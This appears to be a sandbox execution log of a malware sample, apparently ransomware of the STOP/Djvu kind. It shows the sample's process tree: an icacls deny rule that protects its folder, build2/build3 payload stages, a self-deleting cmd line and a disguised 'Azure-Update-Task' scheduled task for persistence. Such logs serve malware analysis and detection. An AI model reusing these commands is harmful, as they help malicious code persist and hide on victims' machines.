C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\c442d324-7e9a-4ddf-8dd2-69fc535a7c1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:8168
-
-
C:\Users\Admin\AppData\Local\Temp\7E74.exe"C:\Users\Admin\AppData\Local\Temp\7E74.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:8108
-
C:\Users\Admin\AppData\Local\Temp\7E74.exe"C:\Users\Admin\AppData\Local\Temp\7E74.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:7492
-
C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build2.exe"C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build2.exe"5⤵PID:4664
-
C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build2.exe"C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build2.exe"6⤵PID:8052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6176
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:5464
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:4732
-
-
-
-
-
C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build3.exe"C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build3.exe"5⤵PID:7364
-
C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build3.exe"C:\Users\Admin\AppData\Local\4bc8bfad-08ed-4bba-9502-515965851fef\build3.exe"6⤵PID:6820
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:5384
-
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6044
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8012
-
C:\Users\Admin\AppData\Local\Temp\CDED.exeC:\Users\Admin\AppData\Local\Temp\CDED.exe1⤵PID:7232